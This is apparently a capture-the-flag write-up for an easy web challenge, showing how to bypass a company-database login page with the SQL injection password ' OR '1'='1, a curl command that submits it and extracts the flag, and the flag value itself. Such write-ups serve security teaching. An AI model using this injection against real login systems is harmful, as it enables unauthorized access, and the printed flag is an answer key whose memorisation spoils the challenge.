Difficulty: easy

Category: web

Author: xnull

Description:

### Company Database Login

You discovered a login page for a company database system. The credentials are unknown, but you need to gain access to retrieve sensitive information.

Find a way to bypass the authentication and log in.

Solution

On the login page, we submit the following credentials to log in as admin:

  • Username: `admin`
  • Password: `' OR '1'='1`

The same request with curl, extracting the flag from the response:

```bash
curl -s https://d03c1ab0-9747-46dc-8732-67f967de7c88.ctf.endolum.io:1337/login -d "username=admin" -d "password=' OR '1'='1" \
| grep -o -E 'ENDLM\{.*\}'
```

Flag: ENDLM{4ad9a282ea5611e912206a02aa3fa11a6d01c866c485137e}